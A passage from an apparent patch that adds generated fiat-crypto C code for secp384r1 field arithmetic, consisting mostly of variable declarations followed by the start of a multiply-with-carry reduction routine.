x824; ++ uint32_t x825; ++ uint32_t x826; ++ uint32_t x827; ++ uint32_t x828; ++ uint32_t x829; ++ uint32_t x830; ++ uint32_t x831; ++ uint32_t x832; ++ fiat_secp384r1_uint1 x833; ++ uint32_t x834; ++ fiat_secp384r1_uint1 x835; ++ uint32_t x836; ++ fiat_secp384r1_uint1 x837; ++ uint32_t x838; ++ fiat_secp384r1_uint1 x839; ++ uint32_t x840; ++ fiat_secp384r1_uint1 x841; ++ uint32_t x842; ++ fiat_secp384r1_uint1 x843; ++ uint32_t x844; ++ fiat_secp384r1_uint1 x845; ++ uint32_t x846; ++ fiat_secp384r1_uint1 x847; ++ uint32_t x848; ++ fiat_secp384r1_uint1 x849; ++ uint32_t x850; ++ fiat_secp384r1_uint1 x851; ++ uint32_t x852; ++ fiat_secp384r1_uint1 x853; ++ uint32_t x854; ++ uint32_t x855; ++ fiat_secp384r1_uint1 x856; ++ uint32_t x857; ++ fiat_secp384r1_uint1 x858; ++ uint32_t x859; ++ fiat_secp384r1_uint1 x860; ++ uint32_t x861; ++ fiat_secp384r1_uint1 x862; ++ uint32_t x863; ++ fiat_secp384r1_uint1 x864; ++ uint32_t x865; ++ fiat_secp384r1_uint1 x866; ++ uint32_t x867; ++ fiat_secp384r1_uint1 x868; ++ uint32_t x869; ++ fiat_secp384r1_uint1 x870; ++ uint32_t x871; ++ fiat_secp384r1_uint1 x872; ++ uint32_t x873; ++ fiat_secp384r1_uint1 x874; ++ uint32_t x875; ++ fiat_secp384r1_uint1 x876; ++ uint32_t x877; ++ fiat_secp384r1_uint1 x878; ++ uint32_t x879; ++ fiat_secp384r1_uint1 x880; ++ uint32_t x881; ++ uint32_t x882; ++ uint32_t x883; ++ uint32_t x884; ++ uint32_t x885; ++ uint32_t x886; ++ uint32_t x887; ++ uint32_t x888; ++ uint32_t x889; ++ uint32_t x890; ++ uint32_t x891; ++ uint32_t x892; ++ uint32_t x893; ++ uint32_t x894; ++ uint32_t x895; ++ uint32_t x896; ++ uint32_t x897; ++ uint32_t x898; ++ uint32_t x899; ++ uint32_t x900; ++ uint32_t x901; ++ fiat_secp384r1_uint1 x902; ++ uint32_t x903; ++ fiat_secp384r1_uint1 x904; ++ uint32_t x905; ++ fiat_secp384r1_uint1 x906; ++ uint32_t x907; ++ fiat_secp384r1_uint1 x908; ++ uint32_t x909; ++ fiat_secp384r1_uint1 x910; ++ uint32_t x911; ++ fiat_secp384r1_uint1 x912; ++ uint32_t x913; ++ fiat_secp384r1_uint1 x914; ++ uint32_t x915; ++ fiat_secp384r1_uint1 x916; ++ uint32_t x917; ++ uint32_t x918; ++ fiat_secp384r1_uint1 x919; ++ uint32_t x920; ++ fiat_secp384r1_uint1 x921; ++ uint32_t x922; ++ fiat_secp384r1_uint1 x923; ++ uint32_t x924; ++ fiat_secp384r1_uint1 x925; ++ uint32_t x926; ++ fiat_secp384r1_uint1 x927; ++ uint32_t x928; ++ fiat_secp384r1_uint1 x929; ++ uint32_t x930; ++ fiat_secp384r1_uint1 x931; ++ uint32_t x932; ++ fiat_secp384r1_uint1 x933; ++ uint32_t x934; ++ fiat_secp384r1_uint1 x935; ++ uint32_t x936; ++ fiat_secp384r1_uint1 x937; ++ uint32_t x938; ++ fiat_secp384r1_uint1 x939; ++ uint32_t x940; ++ fiat_secp384r1_uint1 x941; ++ uint32_t x942; ++ fiat_secp384r1_uint1 x943; ++ uint32_t x944; ++ uint32_t x945; ++ uint32_t x946; ++ uint32_t x947; ++ uint32_t x948; ++ uint32_t x949; ++ uint32_t x950; ++ uint32_t x951; ++ uint32_t x952; ++ uint32_t x953; ++ uint32_t x954; ++ uint32_t x955; ++ uint32_t x956; ++ uint32_t x957; ++ uint32_t x958; ++ uint32_t x959; ++ uint32_t x960; ++ uint32_t x961; ++ uint32_t x962; ++ uint32_t x963; ++ uint32_t x964; ++ uint32_t x965; ++ uint32_t x966; ++ uint32_t x967; ++ uint32_t x968; ++ uint32_t x969; ++ fiat_secp384r1_uint1 x970; ++ uint32_t x971; ++ fiat_secp384r1_uint1 x972; ++ uint32_t x973; ++ fiat_secp384r1_uint1 x974; ++ uint32_t x975; ++ fiat_secp384r1_uint1 x976; ++ uint32_t x977; ++ fiat_secp384r1_uint1 x978; ++ uint32_t x979; ++ fiat_secp384r1_uint1 x980; ++ uint32_t x981; ++ fiat_secp384r1_uint1 x982; ++ uint32_t x983; ++ fiat_secp384r1_uint1 x984; ++ uint32_t x985; ++ fiat_secp384r1_uint1 x986; ++ uint32_t x987; ++ fiat_secp384r1_uint1 x988; ++ uint32_t x989; ++ fiat_secp384r1_uint1 x990; ++ uint32_t x991; ++ uint32_t x992; ++ fiat_secp384r1_uint1 x993; ++ uint32_t x994; ++ fiat_secp384r1_uint1 x995; ++ uint32_t x996; ++ fiat_secp384r1_uint1 x997; ++ uint32_t x998; ++ fiat_secp384r1_uint1 x999; ++ uint32_t x1000; ++ fiat_secp384r1_uint1 x1001; ++ uint32_t x1002; ++ fiat_secp384r1_uint1 x1003; ++ uint32_t x1004; ++ fiat_secp384r1_uint1 x1005; ++ uint32_t x1006; ++ fiat_secp384r1_uint1 x1007; ++ uint32_t x1008; ++ fiat_secp384r1_uint1 x1009; ++ uint32_t x1010; ++ fiat_secp384r1_uint1 x1011; ++ uint32_t x1012; ++ fiat_secp384r1_uint1 x1013; ++ uint32_t x1014; ++ fiat_secp384r1_uint1 x1015; ++ uint32_t x1016; ++ fiat_secp384r1_uint1 x1017; ++ uint32_t x1018; ++ uint32_t x1019; ++ uint32_t x1020; ++ uint32_t x1021; ++ uint32_t x1022; ++ uint32_t x1023; ++ uint32_t x1024; ++ uint32_t x1025; ++ uint32_t x1026; ++ uint32_t x1027; ++ uint32_t x1028; ++ uint32_t x1029; ++ uint32_t x1030; ++ uint32_t x1031; ++ uint32_t x1032; ++ uint32_t x1033; ++ uint32_t x1034; ++ uint32_t x1035; ++ uint32_t x1036; ++ uint32_t x1037; ++ uint32_t x1038; ++ fiat_secp384r1_uint1 x1039; ++ uint32_t x1040; ++ fiat_secp384r1_uint1 x1041; ++ uint32_t x1042; ++ fiat_secp384r1_uint1 x1043; ++ uint32_t x1044; ++ fiat_secp384r1_uint1 x1045; ++ uint32_t x1046; ++ fiat_secp384r1_uint1 x1047; ++ uint32_t x1048; ++ fiat_secp384r1_uint1 x1049; ++ uint32_t x1050; ++ fiat_secp384r1_uint1 x1051; ++ uint32_t x1052; ++ fiat_secp384r1_uint1 x1053; ++ uint32_t x1054; ++ uint32_t x1055; ++ fiat_secp384r1_uint1 x1056; ++ uint32_t x1057; ++ fiat_secp384r1_uint1 x1058; ++ uint32_t x1059; ++ fiat_secp384r1_uint1 x1060; ++ uint32_t x1061; ++ fiat_secp384r1_uint1 x1062; ++ uint32_t x1063; ++ fiat_secp384r1_uint1 x1064; ++ uint32_t x1065; ++ fiat_secp384r1_uint1 x1066; ++ uint32_t x1067; ++ fiat_secp384r1_uint1 x1068; ++ uint32_t x1069; ++ fiat_secp384r1_uint1 x1070; ++ uint32_t x1071; ++ fiat_secp384r1_uint1 x1072; ++ uint32_t x1073; ++ fiat_secp384r1_uint1 x1074; ++ uint32_t x1075; ++ fiat_secp384r1_uint1 x1076; ++ uint32_t x1077; ++ fiat_secp384r1_uint1 x1078; ++ uint32_t x1079; ++ fiat_secp384r1_uint1 x1080; ++ uint32_t x1081; ++ uint32_t x1082; ++ uint32_t x1083; ++ uint32_t x1084; ++ uint32_t x1085; ++ uint32_t x1086; ++ uint32_t x1087; ++ uint32_t x1088; ++ uint32_t x1089; ++ uint32_t x1090; ++ uint32_t x1091; ++ uint32_t x1092; ++ uint32_t x1093; ++ uint32_t x1094; ++ uint32_t x1095; ++ uint32_t x1096; ++ uint32_t x1097; ++ uint32_t x1098; ++ uint32_t x1099; ++ uint32_t x1100; ++ uint32_t x1101; ++ uint32_t x1102; ++ uint32_t x1103; ++ uint32_t x1104; ++ uint32_t x1105; ++ uint32_t x1106; ++ fiat_secp384r1_uint1 x1107; ++ uint32_t x1108; ++ fiat_secp384r1_uint1 x1109; ++ uint32_t x1110; ++ fiat_secp384r1_uint1 x1111; ++ uint32_t x1112; ++ fiat_secp384r1_uint1 x1113; ++ uint32_t x1114; ++ fiat_secp384r1_uint1 x1115; ++ uint32_t x1116; ++ fiat_secp384r1_uint1 x1117; ++ uint32_t x1118; ++ fiat_secp384r1_uint1 x1119; ++ uint32_t x1120; ++ fiat_secp384r1_uint1 x1121; ++ uint32_t x1122; ++ fiat_secp384r1_uint1 x1123; ++ uint32_t x1124; ++ fiat_secp384r1_uint1 x1125; ++ uint32_t x1126; ++ fiat_secp384r1_uint1 x1127; ++ uint32_t x1128; ++ uint32_t x1129; ++ fiat_secp384r1_uint1 x1130; ++ uint32_t x1131; ++ fiat_secp384r1_uint1 x1132; ++ uint32_t x1133; ++ fiat_secp384r1_uint1 x1134; ++ uint32_t x1135; ++ fiat_secp384r1_uint1 x1136; ++ uint32_t x1137; ++ fiat_secp384r1_uint1 x1138; ++ uint32_t x1139; ++ fiat_secp384r1_uint1 x1140; ++ uint32_t x1141; ++ fiat_secp384r1_uint1 x1142; ++ uint32_t x1143; ++ fiat_secp384r1_uint1 x1144; ++ uint32_t x1145; ++ fiat_secp384r1_uint1 x1146; ++ uint32_t x1147; ++ fiat_secp384r1_uint1 x1148; ++ uint32_t x1149; ++ fiat_secp384r1_uint1 x1150; ++ uint32_t x1151; ++ fiat_secp384r1_uint1 x1152; ++ uint32_t x1153; ++ fiat_secp384r1_uint1 x1154; ++ uint32_t x1155; ++ uint32_t x1156; ++ uint32_t x1157; ++ uint32_t x1158; ++ uint32_t x1159; ++ uint32_t x1160; ++ uint32_t x1161; ++ uint32_t x1162; ++ uint32_t x1163; ++ uint32_t x1164; ++ uint32_t x1165; ++ uint32_t x1166; ++ uint32_t x1167; ++ uint32_t x1168; ++ uint32_t x1169; ++ uint32_t x1170; ++ uint32_t x1171; ++ uint32_t x1172; ++ uint32_t x1173; ++ uint32_t x1174; ++ uint32_t x1175; ++ fiat_secp384r1_uint1 x1176; ++ uint32_t x1177; ++ fiat_secp384r1_uint1 x1178; ++ uint32_t x1179; ++ fiat_secp384r1_uint1 x1180; ++ uint32_t x1181; ++ fiat_secp384r1_uint1 x1182; ++ uint32_t x1183; ++ fiat_secp384r1_uint1 x1184; ++ uint32_t x1185; ++ fiat_secp384r1_uint1 x1186; ++ uint32_t x1187; ++ fiat_secp384r1_uint1 x1188; ++ uint32_t x1189; ++ fiat_secp384r1_uint1 x1190; ++ uint32_t x1191; ++ uint32_t x1192; ++ fiat_secp384r1_uint1 x1193; ++ uint32_t x1194; ++ fiat_secp384r1_uint1 x1195; ++ uint32_t x1196; ++ fiat_secp384r1_uint1 x1197; ++ uint32_t x1198; ++ fiat_secp384r1_uint1 x1199; ++ uint32_t x1200; ++ fiat_secp384r1_uint1 x1201; ++ uint32_t x1202; ++ fiat_secp384r1_uint1 x1203; ++ uint32_t x1204; ++ fiat_secp384r1_uint1 x1205; ++ uint32_t x1206; ++ fiat_secp384r1_uint1 x1207; ++ uint32_t x1208; ++ fiat_secp384r1_uint1 x1209; ++ uint32_t x1210; ++ fiat_secp384r1_uint1 x1211; ++ uint32_t x1212; ++ fiat_secp384r1_uint1 x1213; ++ uint32_t x1214; ++ fiat_secp384r1_uint1 x1215; ++ uint32_t x1216; ++ fiat_secp384r1_uint1 x1217; ++ uint32_t x1218; ++ uint32_t x1219; ++ uint32_t x1220; ++ uint32_t x1221; ++ uint32_t x1222; ++ uint32_t x1223; ++ uint32_t x1224; ++ uint32_t x1225; ++ uint32_t x1226; ++ uint32_t x1227; ++ uint32_t x1228; ++ uint32_t x1229; ++ uint32_t x1230; ++ uint32_t x1231; ++ uint32_t x1232; ++ uint32_t x1233; ++ uint32_t x1234; ++ uint32_t x1235; ++ uint32_t x1236; ++ uint32_t x1237; ++ uint32_t x1238; ++ uint32_t x1239; ++ uint32_t x1240; ++ uint32_t x1241; ++ uint32_t x1242; ++ uint32_t x1243; ++ fiat_secp384r1_uint1 x1244; ++ uint32_t x1245; ++ fiat_secp384r1_uint1 x1246; ++ uint32_t x1247; ++ fiat_secp384r1_uint1 x1248; ++ uint32_t x1249; ++ fiat_secp384r1_uint1 x1250; ++ uint32_t x1251; ++ fiat_secp384r1_uint1 x1252; ++ uint32_t x1253; ++ fiat_secp384r1_uint1 x1254; ++ uint32_t x1255; ++ fiat_secp384r1_uint1 x1256; ++ uint32_t x1257; ++ fiat_secp384r1_uint1 x1258; ++ uint32_t x1259; ++ fiat_secp384r1_uint1 x1260; ++ uint32_t x1261; ++ fiat_secp384r1_uint1 x1262; ++ uint32_t x1263; ++ fiat_secp384r1_uint1 x1264; ++ uint32_t x1265; ++ uint32_t x1266; ++ fiat_secp384r1_uint1 x1267; ++ uint32_t x1268; ++ fiat_secp384r1_uint1 x1269; ++ uint32_t x1270; ++ fiat_secp384r1_uint1 x1271; ++ uint32_t x1272; ++ fiat_secp384r1_uint1 x1273; ++ uint32_t x1274; ++ fiat_secp384r1_uint1 x1275; ++ uint32_t x1276; ++ fiat_secp384r1_uint1 x1277; ++ uint32_t x1278; ++ fiat_secp384r1_uint1 x1279; ++ uint32_t x1280; ++ fiat_secp384r1_uint1 x1281; ++ uint32_t x1282; ++ fiat_secp384r1_uint1 x1283; ++ uint32_t x1284; ++ fiat_secp384r1_uint1 x1285; ++ uint32_t x1286; ++ fiat_secp384r1_uint1 x1287; ++ uint32_t x1288; ++ fiat_secp384r1_uint1 x1289; ++ uint32_t x1290; ++ fiat_secp384r1_uint1 x1291; ++ uint32_t x1292; ++ uint32_t x1293; ++ uint32_t x1294; ++ uint32_t x1295; ++ uint32_t x1296; ++ uint32_t x1297; ++ uint32_t x1298; ++ uint32_t x1299; ++ uint32_t x1300; ++ uint32_t x1301; ++ uint32_t x1302; ++ uint32_t x1303; ++ uint32_t x1304; ++ uint32_t x1305; ++ uint32_t x1306; ++ uint32_t x1307; ++ uint32_t x1308; ++ uint32_t x1309; ++ uint32_t x1310; ++ uint32_t x1311; ++ uint32_t x1312; ++ fiat_secp384r1_uint1 x1313; ++ uint32_t x1314; ++ fiat_secp384r1_uint1 x1315; ++ uint32_t x1316; ++ fiat_secp384r1_uint1 x1317; ++ uint32_t x1318; ++ fiat_secp384r1_uint1 x1319; ++ uint32_t x1320; ++ fiat_secp384r1_uint1 x1321; ++ uint32_t x1322; ++ fiat_secp384r1_uint1 x1323; ++ uint32_t x1324; ++ fiat_secp384r1_uint1 x1325; ++ uint32_t x1326; ++ fiat_secp384r1_uint1 x1327; ++ uint32_t x1328; ++ uint32_t x1329; ++ fiat_secp384r1_uint1 x1330; ++ uint32_t x1331; ++ fiat_secp384r1_uint1 x1332; ++ uint32_t x1333; ++ fiat_secp384r1_uint1 x1334; ++ uint32_t x1335; ++ fiat_secp384r1_uint1 x1336; ++ uint32_t x1337; ++ fiat_secp384r1_uint1 x1338; ++ uint32_t x1339; ++ fiat_secp384r1_uint1 x1340; ++ uint32_t x1341; ++ fiat_secp384r1_uint1 x1342; ++ uint32_t x1343; ++ fiat_secp384r1_uint1 x1344; ++ uint32_t x1345; ++ fiat_secp384r1_uint1 x1346; ++ uint32_t x1347; ++ fiat_secp384r1_uint1 x1348; ++ uint32_t x1349; ++ fiat_secp384r1_uint1 x1350; ++ uint32_t x1351; ++ fiat_secp384r1_uint1 x1352; ++ uint32_t x1353; ++ fiat_secp384r1_uint1 x1354; ++ uint32_t x1355; ++ uint32_t x1356; ++ uint32_t x1357; ++ uint32_t x1358; ++ uint32_t x1359; ++ uint32_t x1360; ++ uint32_t x1361; ++ uint32_t x1362; ++ uint32_t x1363; ++ uint32_t x1364; ++ uint32_t x1365; ++ uint32_t x1366; ++ uint32_t x1367; ++ uint32_t x1368; ++ uint32_t x1369; ++ uint32_t x1370; ++ uint32_t x1371; ++ uint32_t x1372; ++ uint32_t x1373; ++ uint32_t x1374; ++ uint32_t x1375; ++ uint32_t x1376; ++ uint32_t x1377; ++ uint32_t x1378; ++ uint32_t x1379; ++ uint32_t x1380; ++ fiat_secp384r1_uint1 x1381; ++ uint32_t x1382; ++ fiat_secp384r1_uint1 x1383; ++ uint32_t x1384; ++ fiat_secp384r1_uint1 x1385; ++ uint32_t x1386; ++ fiat_secp384r1_uint1 x1387; ++ uint32_t x1388; ++ fiat_secp384r1_uint1 x1389; ++ uint32_t x1390; ++ fiat_secp384r1_uint1 x1391; ++ uint32_t x1392; ++ fiat_secp384r1_uint1 x1393; ++ uint32_t x1394; ++ fiat_secp384r1_uint1 x1395; ++ uint32_t x1396; ++ fiat_secp384r1_uint1 x1397; ++ uint32_t x1398; ++ fiat_secp384r1_uint1 x1399; ++ uint32_t x1400; ++ fiat_secp384r1_uint1 x1401; ++ uint32_t x1402; ++ uint32_t x1403; ++ fiat_secp384r1_uint1 x1404; ++ uint32_t x1405; ++ fiat_secp384r1_uint1 x1406; ++ uint32_t x1407; ++ fiat_secp384r1_uint1 x1408; ++ uint32_t x1409; ++ fiat_secp384r1_uint1 x1410; ++ uint32_t x1411; ++ fiat_secp384r1_uint1 x1412; ++ uint32_t x1413; ++ fiat_secp384r1_uint1 x1414; ++ uint32_t x1415; ++ fiat_secp384r1_uint1 x1416; ++ uint32_t x1417; ++ fiat_secp384r1_uint1 x1418; ++ uint32_t x1419; ++ fiat_secp384r1_uint1 x1420; ++ uint32_t x1421; ++ fiat_secp384r1_uint1 x1422; ++ uint32_t x1423; ++ fiat_secp384r1_uint1 x1424; ++ uint32_t x1425; ++ fiat_secp384r1_uint1 x1426; ++ uint32_t x1427; ++ fiat_secp384r1_uint1 x1428; ++ uint32_t x1429; ++ uint32_t x1430; ++ uint32_t x1431; ++ uint32_t x1432; ++ uint32_t x1433; ++ uint32_t x1434; ++ uint32_t x1435; ++ uint32_t x1436; ++ uint32_t x1437; ++ uint32_t x1438; ++ uint32_t x1439; ++ uint32_t x1440; ++ uint32_t x1441; ++ uint32_t x1442; ++ uint32_t x1443; ++ uint32_t x1444; ++ uint32_t x1445; ++ uint32_t x1446; ++ uint32_t x1447; ++ uint32_t x1448; ++ uint32_t x1449; ++ fiat_secp384r1_uint1 x1450; ++ uint32_t x1451; ++ fiat_secp384r1_uint1 x1452; ++ uint32_t x1453; ++ fiat_secp384r1_uint1 x1454; ++ uint32_t x1455; ++ fiat_secp384r1_uint1 x1456; ++ uint32_t x1457; ++ fiat_secp384r1_uint1 x1458; ++ uint32_t x1459; ++ fiat_secp384r1_uint1 x1460; ++ uint32_t x1461; ++ fiat_secp384r1_uint1 x1462; ++ uint32_t x1463; ++ fiat_secp384r1_uint1 x1464; ++ uint32_t x1465; ++ uint32_t x1466; ++ fiat_secp384r1_uint1 x1467; ++ uint32_t x1468; ++ fiat_secp384r1_uint1 x1469; ++ uint32_t x1470; ++ fiat_secp384r1_uint1 x1471; ++ uint32_t x1472; ++ fiat_secp384r1_uint1 x1473; ++ uint32_t x1474; ++ fiat_secp384r1_uint1 x1475; ++ uint32_t x1476; ++ fiat_secp384r1_uint1 x1477; ++ uint32_t x1478; ++ fiat_secp384r1_uint1 x1479; ++ uint32_t x1480; ++ fiat_secp384r1_uint1 x1481; ++ uint32_t x1482; ++ fiat_secp384r1_uint1 x1483; ++ uint32_t x1484; ++ fiat_secp384r1_uint1 x1485; ++ uint32_t x1486; ++ fiat_secp384r1_uint1 x1487; ++ uint32_t x1488; ++ fiat_secp384r1_uint1 x1489; ++ uint32_t x1490; ++ fiat_secp384r1_uint1 x1491; ++ uint32_t x1492; ++ uint32_t x1493; ++ uint32_t x1494; ++ uint32_t x1495; ++ uint32_t x1496; ++ uint32_t x1497; ++ uint32_t x1498; ++ uint32_t x1499; ++ uint32_t x1500; ++ uint32_t x1501; ++ uint32_t x1502; ++ uint32_t x1503; ++ uint32_t x1504; ++ uint32_t x1505; ++ uint32_t x1506; ++ uint32_t x1507; ++ uint32_t x1508; ++ uint32_t x1509; ++ uint32_t x1510; ++ uint32_t x1511; ++ uint32_t x1512; ++ uint32_t x1513; ++ uint32_t x1514; ++ uint32_t x1515; ++ uint32_t x1516; ++ uint32_t x1517; ++ fiat_secp384r1_uint1 x1518; ++ uint32_t x1519; ++ fiat_secp384r1_uint1 x1520; ++ uint32_t x1521; ++ fiat_secp384r1_uint1 x1522; ++ uint32_t x1523; ++ fiat_secp384r1_uint1 x1524; ++ uint32_t x1525; ++ fiat_secp384r1_uint1 x1526; ++ uint32_t x1527; ++ fiat_secp384r1_uint1 x1528; ++ uint32_t x1529; ++ fiat_secp384r1_uint1 x1530; ++ uint32_t x1531; ++ fiat_secp384r1_uint1 x1532; ++ uint32_t x1533; ++ fiat_secp384r1_uint1 x1534; ++ uint32_t x1535; ++ fiat_secp384r1_uint1 x1536; ++ uint32_t x1537; ++ fiat_secp384r1_uint1 x1538; ++ uint32_t x1539; ++ uint32_t x1540; ++ fiat_secp384r1_uint1 x1541; ++ uint32_t x1542; ++ fiat_secp384r1_uint1 x1543; ++ uint32_t x1544; ++ fiat_secp384r1_uint1 x1545; ++ uint32_t x1546; ++ fiat_secp384r1_uint1 x1547; ++ uint32_t x1548; ++ fiat_secp384r1_uint1 x1549; ++ uint32_t x1550; ++ fiat_secp384r1_uint1 x1551; ++ uint32_t x1552; ++ fiat_secp384r1_uint1 x1553; ++ uint32_t x1554; ++ fiat_secp384r1_uint1 x1555; ++ uint32_t x1556; ++ fiat_secp384r1_uint1 x1557; ++ uint32_t x1558; ++ fiat_secp384r1_uint1 x1559; ++ uint32_t x1560; ++ fiat_secp384r1_uint1 x1561; ++ uint32_t x1562; ++ fiat_secp384r1_uint1 x1563; ++ uint32_t x1564; ++ fiat_secp384r1_uint1 x1565; ++ uint32_t x1566; ++ uint32_t x1567; ++ uint32_t x1568; ++ uint32_t x1569; ++ uint32_t x1570; ++ uint32_t x1571; ++ uint32_t x1572; ++ uint32_t x1573; ++ uint32_t x1574; ++ uint32_t x1575; ++ uint32_t x1576; ++ uint32_t x1577; ++ uint32_t x1578; ++ uint32_t x1579; ++ uint32_t x1580; ++ uint32_t x1581; ++ uint32_t x1582; ++ uint32_t x1583; ++ uint32_t x1584; ++ uint32_t x1585; ++ uint32_t x1586; ++ fiat_secp384r1_uint1 x1587; ++ uint32_t x1588; ++ fiat_secp384r1_uint1 x1589; ++ uint32_t x1590; ++ fiat_secp384r1_uint1 x1591; ++ uint32_t x1592; ++ fiat_secp384r1_uint1 x1593; ++ uint32_t x1594; ++ fiat_secp384r1_uint1 x1595; ++ uint32_t x1596; ++ fiat_secp384r1_uint1 x1597; ++ uint32_t x1598; ++ fiat_secp384r1_uint1 x1599; ++ uint32_t x1600; ++ fiat_secp384r1_uint1 x1601; ++ uint32_t x1602; ++ uint32_t x1603; ++ fiat_secp384r1_uint1 x1604; ++ uint32_t x1605; ++ fiat_secp384r1_uint1 x1606; ++ uint32_t x1607; ++ fiat_secp384r1_uint1 x1608; ++ uint32_t x1609; ++ fiat_secp384r1_uint1 x1610; ++ uint32_t x1611; ++ fiat_secp384r1_uint1 x1612; ++ uint32_t x1613; ++ fiat_secp384r1_uint1 x1614; ++ uint32_t x1615; ++ fiat_secp384r1_uint1 x1616; ++ uint32_t x1617; ++ fiat_secp384r1_uint1 x1618; ++ uint32_t x1619; ++ fiat_secp384r1_uint1 x1620; ++ uint32_t x1621; ++ fiat_secp384r1_uint1 x1622; ++ uint32_t x1623; ++ fiat_secp384r1_uint1 x1624; ++ uint32_t x1625; ++ fiat_secp384r1_uint1 x1626; ++ uint32_t x1627; ++ fiat_secp384r1_uint1 x1628; ++ uint32_t x1629; ++ uint32_t x1630; ++ fiat_secp384r1_uint1 x1631; ++ uint32_t x1632; ++ fiat_secp384r1_uint1 x1633; ++ uint32_t x1634; ++ fiat_secp384r1_uint1 x1635; ++ uint32_t x1636; ++ fiat_secp384r1_uint1 x1637; ++ uint32_t x1638; ++ fiat_secp384r1_uint1 x1639; ++ uint32_t x1640; ++ fiat_secp384r1_uint1 x1641; ++ uint32_t x1642; ++ fiat_secp384r1_uint1 x1643; ++ uint32_t x1644; ++ fiat_secp384r1_uint1 x1645; ++ uint32_t x1646; ++ fiat_secp384r1_uint1 x1647; ++ uint32_t x1648; ++ fiat_secp384r1_uint1 x1649; ++ uint32_t x1650; ++ fiat_secp384r1_uint1 x1651; ++ uint32_t x1652; ++ fiat_secp384r1_uint1 x1653; ++ uint32_t x1654; ++ fiat_secp384r1_uint1 x1655; ++ uint32_t x1656; ++ uint32_t x1657; ++ uint32_t x1658; ++ uint32_t x1659; ++ uint32_t x1660; ++ uint32_t x1661; ++ uint32_t x1662; ++ uint32_t x1663; ++ uint32_t x1664; ++ uint32_t x1665; ++ uint32_t x1666; ++ uint32_t x1667; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[6]); ++ x7 = (arg1[7]); ++ x8 = (arg1[8]); ++ x9 = (arg1[9]); ++ x10 = (arg1[10]); ++ x11 = (arg1[11]); ++ x12 = (arg1[0]); ++ fiat_secp384r1_mulx_u32(&x13, &x14, x12, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x15, &x16, x12, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x17, &x18, x12, (arg1[9])); ++ fiat_secp384r1_mulx_u32(&x19, &x20, x12, (arg1[8])); ++ fiat_secp384r1_mulx_u32(&x21, &x22, x12, (arg1[7])); ++ fiat_secp384r1_mulx_u32(&x23, &x24, x12, (arg1[6])); ++ fiat_secp384r1_mulx_u32(&x25, &x26, x12, (arg1[5])); ++ fiat_secp384r1_mulx_u32(&x27, &x28, x12, (arg1[4])); ++ fiat_secp384r1_mulx_u32(&x29, &x30, x12, (arg1[3])); ++ fiat_secp384r1_mulx_u32(&x31, &x32, x12, (arg1[2])); ++ fiat_secp384r1_mulx_u32(&x33, &x34, x12, (arg1[1])); ++ fiat_secp384r1_mulx_u32(&x35, &x36, x12, (arg1[0])); ++ fiat_secp384r1_addcarryx_u32(&x37, &x38, 0x0, x36, x33); ++ fiat_secp384r1_addcarryx_u32(&x39, &x40, x38, x34, x31); ++ fiat_secp384r1_addcarryx_u32(&x41, &x42, x40, x32, x29); ++ fiat_secp384r1_addcarryx_u32(&x43, &x44, x42, x30, x27); ++ fiat_secp384r1_addcarryx_u32(&x45, &x46, x44, x28, x25); ++ fiat_secp384r1_addcarryx_u32(&x47, &x48, x46, x26, x23); ++ fiat_secp384r1_addcarryx_u32(&x49, &x50, x48, x24, x21); ++ fiat_secp384r1_addcarryx_u32(&x51, &x52, x50, x22, x19); ++ fiat_secp384r1_addcarryx_u32(&x53, &x54, x52, x20, x17); ++ fiat_secp384r1_addcarryx_u32(&x55, &x56, x54, x18, x15); ++ fiat_secp384r1_addcarryx_u32(&x57, &x58, x56, x16, x13); ++ x59 = (x58 + x14); ++ fiat_secp384r1_mulx_u32(&x60, &x61, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x62, &x63, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x64, &x65, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x66, &x67, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x68, &x69, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x70, &x71, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x72, &x73, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x74, &x75, x35, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x76, &x77, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x78, &x79, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x80, &x81, 0x0, x77, x74); ++ fiat_secp384r1_addcarryx_u32(&x82, &x83, x81, x75, x72); ++ fiat_secp384r1_addcarryx_u32(&x84, &x85, x83, x73, x70); ++ fiat_secp384r1_addcarryx_u32(&x86, &x87, x85, x71, x68); ++ fiat_secp384r1_addcarryx_u32(&x88, &x89, x87, x69, x66); ++ fiat_secp384r1_addcarryx_u32(&x90, &x91, x89, x67, x64); ++ fiat_secp384r1_addcarryx_u32(&x92, &x93, x91, x65, x62); ++ fiat_secp384r1_addcarryx_u32(&x94, &x95, x93, x63, x60); ++ x96 = (x95 + x61); ++ fiat_secp384r1_addcarryx_u32(&x97, &x98, 0x0, x35, x78); ++ fiat_secp384r1_addcarryx_u32(&x99, &x100, x98, x37, x79); ++ fiat_secp384r1_addcarryx_u32(&x101, &x102, x100, x39, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x103, &x104, x102, x41, x76); ++ fiat_secp384r1_addcarryx_u32(&x105, &x106, x104, x43, x80); ++ fiat_secp384r1_addcarryx_u32(&x107, &x108, x106, x45, x82); ++ fiat_secp384r1_addcarryx_u32(&x109, &x110, x108, x47, x84); ++ fiat_secp384r1_addcarryx_u32(&x111, &x112, x110, x49, x86); ++ fiat_secp384r1_addcarryx_u32(&x113, &x114, x112, x51, x88); ++ fiat_secp384r1_addcarryx_u32(&x115, &x116, x114, x53, x90); ++ fiat_secp384r1_addcarryx_u32(&x117, &x118, x116, x55, x92); ++ fiat_secp384r1_addcarryx_u32(&x119, &x120, x118, x57, x94); ++ fiat_secp384r1_addcarryx_u32(&x121, &x122, x120, x59, x96); ++ fiat_secp384r1_mulx_u32(&x123, &x124, x1, (arg1[11])); ++ fiat_secp384r1_mulx_u32(&x125, &x126, x1, (arg1[10])); ++ fiat_secp384r1_mulx_u32(&x127, &x128, x1, 